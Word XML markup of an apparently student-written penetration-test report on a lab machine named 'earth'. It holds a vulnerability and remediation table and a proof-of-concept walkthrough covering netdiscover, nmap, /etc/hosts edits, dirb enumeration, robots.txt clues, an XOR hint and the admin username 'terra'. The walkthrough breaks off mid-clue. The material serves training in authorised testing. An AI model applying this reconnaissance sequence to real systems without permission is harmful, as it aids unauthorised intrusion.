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178"/>
        <w:tblW w:w="11524" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2278"/>
        <w:gridCol w:w="9246"/>
      </w:tblGrid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Describe </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246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ulnerability</w:t>
            </w:r>
          </w:p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vice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRPr="005016CA" w:rsidRDefault="005016CA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sh, http, https</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977A3D" w:rsidTr="00240D98">
        <w:trPr>
          <w:trHeight w:val="731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Ports </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRPr="005016CA" w:rsidRDefault="005016CA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2, 80, 443</w:t>
            </w:r>
          </w:p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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRPr="005016CA" w:rsidRDefault="005016CA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4.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005016CA" w:rsidTr="00240D98">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2278" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005016CA" w:rsidRDefault="005016CA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verity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005016CA" w:rsidRDefault="001B0294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um</w:t>
            </w:r>
          </w:p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Cve id </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRDefault="00977A3D" w:rsidP="00240D98"/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 w:rsidRPr="00977A3D">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Cvss</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> score </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRPr="00977A3D" w:rsidRDefault="001B0294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7/10</w:t>
            </w:r>
          </w:p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Default="00977A3D" w:rsidP="00240D98">
            <w:r w:rsidRPr="00977A3D">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006F7613" w:rsidRDefault="006F7613" w:rsidP="00240D98"/>
          <w:p w:rsidR="006F7613" w:rsidRPr="00E51B2E" w:rsidRDefault="006F7613" w:rsidP="00240D98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proper configuration of SSL/TLS certificates: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E51B2E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability: </w:t>
            </w:r>
            <w:r w:rsidRPr="00E51B2E">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Exposure of internal hostnames through SSL/TLS certificates can </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E51B2E">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>inadvertently  reveal</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E51B2E">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> network structure information to atta</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>cker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5"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51B2E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Remediation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nsure that SSL/TLS certificates do not disclose sensitive internal information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gularly audit certificates to confirm they only contain necessary and appropriate detail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Secure Handling of Sensitive Files: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00A073BA" w:rsidRDefault="006F7613" w:rsidP="00240D9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ulnerability: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Publicly accessible files, such as ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00A073BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>robot.txt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’, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>may inadvertently disclose sensitive directories or file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A073BA">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Lim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>it thee use of “</w:t>
            </w:r>
            <w:r w:rsidRPr="00A073BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>robot.txt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” </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>to controlling web crawler behavior without exposing sensitive path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1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tore sensitive files outside of web-accessible directories and implement proper access controls.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00A073BA" w:rsidRDefault="006F7613" w:rsidP="00240D98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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Avoidance of Hardcoded Credentials and sensitive data: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2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ulnerability: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A073BA">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedding sensitive information, such as encryption </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>keys or credentials, within publicly accessible files can Iead to unauthorized acces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2"/>
              </w:num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s:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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ore sensitive data securely using environment variables or secure vaults, rather than hardcoding them in file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3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gularly review and sanitize files to ensure they do not contain exposed sensitive information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00110404" w:rsidRDefault="006F7613" w:rsidP="00240D9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Implementation of strong Authentication Mechanisms:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00110404" w:rsidRDefault="006F7613" w:rsidP="00240D9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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability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Pr="00110404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">weak or easily guessable passwords can be exploited </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>to gain unauthorized acces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4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mediation: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17"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>En</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>force strong password policies that requies complex and unique passwords.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17"/>
              </w:num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mplement multi-factor authentication (MFA) to add an </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>additional layers of security</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>.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8"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F7613">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Regular Software Updates and patch Management:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00110404" w:rsidRDefault="006F7613" w:rsidP="00240D9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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Outdated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> software may contain knows vulnerability that can be exploited by attackers.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00110404" w:rsidRDefault="006F7613" w:rsidP="00240D98">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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Remediations: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="00110404" w:rsidRDefault="006F7613" w:rsidP="00240D98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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Establish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10404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">routine patch </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00110404">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> to ensure all software and dependencies are up-to-date. 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19"/>
              </w:num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>Monitor for and apply security patches promptly to mitigate known vulnerabilities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8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Secure Configuration of Exexutable Files and scripts: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Vulnerability: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Executable files or scripts with improper permissions or configurations can be exploited for privilege escalation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRDefault="006F7613" w:rsidP="00240D98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Remediations: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>Set appropriate permissions on executable files and scripts to restrict unauthorized execution.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7613" w:rsidRPr="006F7613" w:rsidRDefault="006F7613" w:rsidP="00240D9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Regularly audit and test scripts to ensure they dod not contain vulnerabilities that could be exploited. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E51B2E" w:rsidRPr="006F7613" w:rsidRDefault="00E51B2E" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977A3D" w:rsidTr="00240D98">
        <w:trPr>
          <w:trHeight w:val="731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POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D98"/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1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find our ip add in kali machine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095F5FC" wp14:editId="140A860A">
                  <wp:extent cx="5731510" cy="1518285"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="916283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6283704" name="Picture 91628370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After that I find victim ip add with the help of Netdiscover </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/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2C4D7AA" wp14:editId="04929CA5">
                  <wp:extent cx="5731510" cy="1159510"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="5750096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5009647" name="Picture 575009647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that’s I’ve identified the victim’s IP address </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>as  (</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.101) I’ll scan for open ports on their machin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Next</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I run an Nmap scan to identify open ports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79015D3" wp14:editId="3DA1F5C0">
                  <wp:extent cx="5731510" cy="2727960"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="98597650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976503" name="Picture 98597650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scanning I get open ports of ssh, http, https now I look </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>website  one</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> gathering some info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95DA623" wp14:editId="68BB48F4">
                  <wp:extent cx="5731510" cy="2568575"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
                  <wp:docPr id="166538862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388621" name="Picture 16653886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t’s show bad request and nothing information get in source code also so I look one time more in Nmap for getting some hint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 http and https already show “400 bad request” and another thing is I get is DNS so now I trying to access website with DNS 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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>do  “</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">nano /etc/hosts”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b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00E83024">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>etc/hosts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">” its’s a system file that maps ‘IP Addresses to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>hostnames ’</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> a kind of local DNS. Before the system queries external DNS server, it checks this file to resolve hostnames.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3EABA57" wp14:editId="0EFB858F">
                  <wp:extent cx="4515480" cy="724001"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19874556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455675" name="Picture 198745567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623F6C6E" wp14:editId="362F9B9E">
                  <wp:extent cx="5731510" cy="2120900"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="9888400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840095" name="Picture 98884009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2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2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ext, I attempt to access the website again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B71C634" wp14:editId="36CD8F82">
                  <wp:extent cx="5731510" cy="2687955"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="5237236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23601" name="Picture 52372360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 yes, now I can easily access this time now it’s time to gathering information about earth machines</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr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t>But first I do dirb fo looking some open directory about earth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707472C" wp14:editId="3D420766">
                  <wp:extent cx="5731510" cy="3976370"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
                  <wp:docPr id="34098296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982964" name="Picture 34098296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97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dn’t get anything from ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>earth.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">’ except login page of admin panel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922B889" wp14:editId="340E2980">
                  <wp:extent cx="5731510" cy="2355850"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="813802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0257" name="Picture 81380257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so now I access ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>terratest.earth</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>.local’ for getting something interesting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after access ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>terratest.earth</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>.local’ I get same result as ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>earth.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>’ so now I move myself http to https for getting the result different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E5AE327" wp14:editId="1FC905DE">
                  <wp:extent cx="5731510" cy="1085215"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="635"/>
                  <wp:docPr id="812713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27133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ts looks different from http so, now I use dirb again for getting some result different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3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DF2E00C" wp14:editId="698A3AB9">
                  <wp:extent cx="4244340" cy="2890064"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
                  <wp:docPr id="206685889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858897" name="Picture 206685889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492" cy="2891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accessing </w:t>
            </w:r>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidRPr="008B1685">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="40"/>
                  <w:szCs w:val="40"/>
                </w:rPr>
                <w:t>https://terratest.earth.local/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I get robobt.txt file and the status code also ‘200 ok’ so now I can know about website in dept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6FBA98A" wp14:editId="2FA40746">
                  <wp:extent cx="4686300" cy="3534714"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="1868531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5318" name="Picture 186853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042" cy="354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opening robot.txt I get lots of directories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 opening ‘testing.txt’ file for getting some different results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2B7D0E3" wp14:editId="20D560BE">
                  <wp:extent cx="5731510" cy="1865630"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="103953923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9539230" name="Picture 103953923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6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’s a hint </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>I  we</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> see the page of website you get lots of encryption </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>message  it’s</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> encrypted by “</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>XOR”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> algorithm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another line I get one more directory is ‘testdata.txt’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f you read carefully, you see that ‘testdata.txt’ is a key of encrypted messages about earth </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>And in third line I get username of admin panel are “</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>terra”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">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I get four </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>clue</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> in this directory </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="000D6186" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>first :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>- the message</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5BA8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">encrypted </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>in earth used a XOR algorithm</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D6186">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>second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 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>- I get one more directory in testing.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D6186">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>third :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D6186">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>-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 the message</w:t>
            </w:r>
            <w:r w:rsidRPr="000D6186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encrypted by XOR the key is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
